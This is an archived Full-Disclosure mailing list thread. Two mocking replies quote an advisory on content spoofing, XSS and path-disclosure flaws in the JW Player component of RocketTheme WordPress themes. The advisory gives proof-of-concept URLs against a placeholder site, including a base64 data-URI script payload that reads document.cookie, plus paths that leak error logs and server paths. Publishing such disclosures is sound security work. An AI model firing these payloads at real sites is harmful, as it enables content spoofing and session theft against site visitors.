'Re: [Full-disclosure] Multiple vulnerabilities in RocketTheme themes for WordPress'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    Re: [Full-disclosure] Multiple vulnerabilities in RocketTheme themes for WordPress
From:       "winsoc" <winsoc () gmail ! com>
Date:       2012-12-30 15:38:56
Message-ID: 001401cde6a3$c81f61d0$585e2570$ () gmail ! com
[Download RAW message or body]

This is a multipart message in MIME format.

[Attachment #2 (multipart/alternative)]
This is a multipart message in MIME format.


Can’t help it, but J What a lewzer troll

 

From: full-disclosure-bounces@lists.grok.org.uk
[mailto:full-disclosure-bounces@lists.grok.org.uk] On Behalf Of Julius
Kivimäki
Sent: 29 December 2012 22:55
To: MustLive
Cc: full-disclosure@lists.grok.org.uk; submissions@packetstormsecurity.org
Subject: Re: [Full-disclosure] Multiple vulnerabilities in RocketTheme
themes for WordPress

 

Full path disclosure, vulnerability?

Ahahahahaha, good joke! You made my day.

2012/12/29 MustLive <mustlive@websecurity.com.ua>

Hello list!

Earlier I've wrote to the list about multiple vulnerabilities in multiple
themes for WordPress (http://seclists.org/fulldisclosure/2012/Dec/236). In
that later I've mentioned 16 themes by RocketTheme (with Rokbox):
Afterburner, Refraction, Solarsentinel, Mixxmag, Iridium, Infuse,
Perihelion, Replicant2, Affinity, Nexus, Sentinel, Mynxx Vestnikp, Mynxx,
Moxy, Terrantribune, Meridian.

I've wrote about 14 themes + 2 variations of 2 themes by these developers,
but they have 47 themes for WordPress in total. Among them only three are
free, and all other themes from RocketTheme are paid ones (it's needed to
buy subscription to the club to receive access to them). And Rokbox is
bundled with all these themes, except Grunge, which have all
earlier-mentioned vulnerabilities.

So I inform you about multiple vulnerabilities in 33 new themes for
WordPress, which are developed by RocketTheme (Rokbox's developers). These
are Content Spoofing, Cross-Site Scripting, Full path disclosure and
Information Leakage vulnerabilities.

-------------------------
Affected products:
-------------------------

In these 32 themes (in addition to previous 16) there are Cross-Site
Scripting, Content Spoofing, Full path disclosure and Information Leakage
vulnerabilities. And Grunge theme has FPD holes.

These are the next themes by RocketTheme: Voxel, Diametric, Ionosphere,
Clarion, Halcyon, Visage, Enigma, Momentum, Radiance, Camber, Reflex,
Modulus, Nebulae, Entropy, Tachyon, Mercado, Maelstrom, Syndicate, Paradox,
Hybrid, Omnicron, Zephyr, Panacea, Somaxiom, Juxta, Quantive, Crystalline,
Kinetic, Dominion, Reaction, Akiraka, Novus and Grunge.

Affected all versions of these themes for WordPress.

Since August I've informed the developers many times concerning
vulnerabilities in Rokbox and their themes with it.

----------
Details:
----------

Content Spoofing (WASC-12):

In parameter file there can be set as video, as audio files.

Swf-file of JW Player accepts arbitrary addresses in parameters file and
image, which allows to spoof content of flash - i.e. by setting addresses of
video (audio) and/or image files from other site.

http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwpla
yer.swf?file=1.flv
<http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwpl
ayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF>
&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwpla
yer.swf?file=1.flv
<http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwpl
ayer.swf?file=1.flv&image=1.jpg> &image=1.jpg

Content Spoofing (WASC-12):

Swf-file of JW Player accepts arbitrary addresses in parameter config, which
allows to spoof content of flash - i.e. by setting address of config file
from other site (parameters file and image in xml-file accept arbitrary
addresses). For loading of config file from other site it needs to have
crossdomain.xml.

http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwpla
yer.swf?config=1.xml

1.xml

<config>
  <file>1.flv</file>
  <image>1.jpg</image>
</config>

Content Spoofing (WASC-12):

http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwpla
yer.swf?abouttext=Player
<http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwpl
ayer.swf?abouttext=Player&aboutlink=http://site> &aboutlink=http://site

XSS (WASC-08):

http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwpla
yer.swf?abouttext=Player
<http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwpl
ayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydC
hkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B>
&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9
zY3JpcHQ%2B

Full path disclosure (WASC-13):

In all these themes there is FPD in index.php
(http://site/wordpress/wp-content/themes/rt_novus_wp/ and the same for other
themes), which works at default PHP settings. Also potentially there are FPD
in other php-files of these themes.

Information Leakage (WASC-13):

In some themes, similar to rt_mixxmag_wp, there can be error log with full
paths.

http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 


[Attachment #5 (text/html)]

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" \
xmlns:w="urn:schemas-microsoft-com:office:word" \
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml" \
xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Generator content="Microsoft Word 14 \
(filtered medium)"><style><!-- /* Font Definitions */
@font-face
	{font-family:Wingdings;
	panose-1:5 0 0 0 0 0 0 0 0 0;}
@font-face
	{font-family:Wingdings;
	panose-1:5 0 0 0 0 0 0 0 0 0;}
@font-face
	{font-family:Calibri;
	panose-1:2 15 5 2 2 2 4 3 2 4;}
@font-face
	{font-family:Tahoma;
	panose-1:2 11 6 4 3 5 4 4 2 4;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
	{margin:0cm;
	margin-bottom:.0001pt;
	font-size:12.0pt;
	font-family:"Times New Roman","serif";}
a:link, span.MsoHyperlink
	{mso-style-priority:99;
	color:blue;
	text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
	{mso-style-priority:99;
	color:purple;
	text-decoration:underline;}
span.EmailStyle17
	{mso-style-type:personal-reply;
	font-family:"Calibri","sans-serif";
	color:#1F497D;}
.MsoChpDefault
	{mso-style-type:export-only;
	font-family:"Calibri","sans-serif";
	mso-fareast-language:EN-US;}
@page WordSection1
	{size:612.0pt 792.0pt;
	margin:72.0pt 72.0pt 72.0pt 72.0pt;}
div.WordSection1
	{page:WordSection1;}
--></style><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="1026" />
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1" />
</o:shapelayout></xml><![endif]--></head><body lang=EN-GB link=blue vlink=purple><div \
class=WordSection1><p class=MsoNormal><span \
style='font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D'>Can&#8217;t help it, \
but </span><span style='font-size:11.0pt;font-family:Wingdings;color:#1F497D'>J</span><span \
style='font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D'> What a lewzer \
troll<o:p></o:p></span></p><p class=MsoNormal><span \
style='font-size:11.0pt;font-family:"Calibri","sans-serif";color:#1F497D'><o:p>&nbsp;</o:p></span></p><p \
class=MsoNormal><b><span lang=EN-US \
style='font-size:10.0pt;font-family:"Tahoma","sans-serif"'>From:</span></b><span lang=EN-US \
style='font-size:10.0pt;font-family:"Tahoma","sans-serif"'> \
full-disclosure-bounces@lists.grok.org.uk [mailto:full-disclosure-bounces@lists.grok.org.uk] \
<b>On Behalf Of </b>Julius Kivimäki<br><b>Sent:</b> 29 December 2012 22:55<br><b>To:</b> \
MustLive<br><b>Cc:</b> full-disclosure@lists.grok.org.uk; \
submissions@packetstormsecurity.org<br><b>Subject:</b> Re: [Full-disclosure] Multiple \
vulnerabilities in RocketTheme themes for WordPress<o:p></o:p></span></p><p \
class=MsoNormal><o:p>&nbsp;</o:p></p><p class=MsoNormal>Full path disclosure, \
vulnerability?<o:p></o:p></p><div><p class=MsoNormal style='margin-bottom:12.0pt'>Ahahahahaha, \
good joke! You made my day.<o:p></o:p></p><div><p class=MsoNormal>2012/12/29 MustLive &lt;<a \
href="mailto:mustlive@websecurity.com.ua" \
target="_blank">mustlive@websecurity.com.ua</a>&gt;<o:p></o:p></p><p class=MsoNormal>Hello \
list!<br><br>Earlier I've wrote to the list about multiple vulnerabilities in \
multiple<br>themes for WordPress (<a href="http://seclists.org/fulldisclosure/2012/Dec/236" \
target="_blank">http://seclists.org/fulldisclosure/2012/Dec/236</a>). In<br>that later I've \
mentioned 16 themes by RocketTheme (with Rokbox):<br>Afterburner, Refraction, Solarsentinel, \
Mixxmag, Iridium, Infuse,<br>Perihelion, Replicant2, Affinity, Nexus, Sentinel, Mynxx Vestnikp, \
Mynxx,<br>Moxy, Terrantribune, Meridian.<br><br>I've wrote about 14 themes + 2 variations of 2 \
themes by these developers,<br>but they have 47 themes for WordPress in total. Among them only \
three are<br>free, and all other themes from RocketTheme are paid ones (it's needed to<br>buy \
subscription to the club to receive access to them). And Rokbox is<br>bundled with all these \
themes, except Grunge, which have all<br>earlier-mentioned vulnerabilities.<br><br>So I inform \
you about multiple vulnerabilities in 33 new themes for<br>WordPress, which are developed by \
RocketTheme (Rokbox's developers). These<br>are Content Spoofing, Cross-Site Scripting, Full \
path disclosure and<br>Information Leakage \
vulnerabilities.<br><br>-------------------------<br>Affected \
products:<br>-------------------------<br><br>In these 32 themes (in addition to previous 16) \
there are Cross-Site<br>Scripting, Content Spoofing, Full path disclosure and Information \
Leakage<br>vulnerabilities. And Grunge theme has FPD holes.<br><br>These are the next themes by \
RocketTheme: Voxel, Diametric, Ionosphere,<br>Clarion, Halcyon, Visage, Enigma, Momentum, \
Radiance, Camber, Reflex,<br>Modulus, Nebulae, Entropy, Tachyon, Mercado, Maelstrom, Syndicate, \
Paradox,<br>Hybrid, Omnicron, Zephyr, Panacea, Somaxiom, Juxta, Quantive, \
Crystalline,<br>Kinetic, Dominion, Reaction, Akiraka, Novus and Grunge.<br><br>Affected all \
versions of these themes for WordPress.<br><br>Since August I've informed the developers many \
times concerning<br>vulnerabilities in Rokbox and their themes with \
it.<br><br>----------<br>Details:<br>----------<br><br>Content Spoofing (WASC-12):<br><br>In \
parameter file there can be set as video, as audio files.<br><br>Swf-file of JW Player accepts \
arbitrary addresses in parameters file and<br>image, which allows to spoof content of flash - \
i.e. by setting addresses of<br>video (audio) and/or image files from other site.<br><br><a \
href="http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&amp;backcolor=0xFFFFFF&amp;screencolor=0xFFFFFF" \
target="_blank">http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&amp;backcolor=0xFFFFFF&amp;screencolor=0xFFFFFF</a><br><a \
href="http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&amp;image=1.jpg" \
target="_blank">http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&amp;image=1.jpg</a><br><br>Content \
Spoofing (WASC-12):<br><br>Swf-file of JW Player accepts arbitrary addresses in parameter \
config, which<br>allows to spoof content of flash - i.e. by setting address of config \
file<br>from other site (parameters file and image in xml-file accept arbitrary<br>addresses). \
For loading of config file from other site it needs to have<br>crossdomain.xml.<br><br><a \
href="http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?config=1.xml" \
target="_blank">http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?config=1.xml</a><br><br>1.xml<br><br>&lt;config&gt;<br>&nbsp; \
&lt;file&gt;1.flv&lt;/file&gt;<br>&nbsp; \
&lt;image&gt;1.jpg&lt;/image&gt;<br>&lt;/config&gt;<br><br>Content Spoofing \
(WASC-12):<br><br><a \
href="http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&amp;aboutlink=http://site" \
target="_blank">http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&amp;aboutlink=http://site</a><br><br>XSS \
(WASC-08):<br><br><a \
href="http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?aboutt \
ext=Player&amp;aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B" \
target="_blank">http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer. \
swf?abouttext=Player&amp;aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B</a><br><br>Full \
path disclosure (WASC-13):<br><br>In all these themes there is FPD in index.php<br>(<a \
href="http://site/wordpress/wp-content/themes/rt_novus_wp/" \
target="_blank">http://site/wordpress/wp-content/themes/rt_novus_wp/</a> and the same for \
other<br>themes), which works at default PHP settings. Also potentially there are FPD<br>in \
other php-files of these themes.<br><br>Information Leakage (WASC-13):<br><br>In some themes, \
similar to rt_mixxmag_wp, there can be error log with full<br>paths.<br><br><a \
href="http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log" \
target="_blank">http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log</a><br><br>Best \
wishes &amp; regards,<br>MustLive<br>Administrator of Websecurity web site<br><a \
href="http://websecurity.com.ua" \
target="_blank">http://websecurity.com.ua</a><br><br><br>_______________________________________________<br>Full-Disclosure \
- We believe in it.<br>Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html" \
target="_blank">http://lists.grok.org.uk/full-disclosure-charter.html</a><br>Hosted and \
sponsored by Secunia - <a href="http://secunia.com/" \
target="_blank">http://secunia.com/</a><o:p></o:p></p></div><p \
class=MsoNormal><o:p>&nbsp;</o:p></p></div></div></body></html>



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic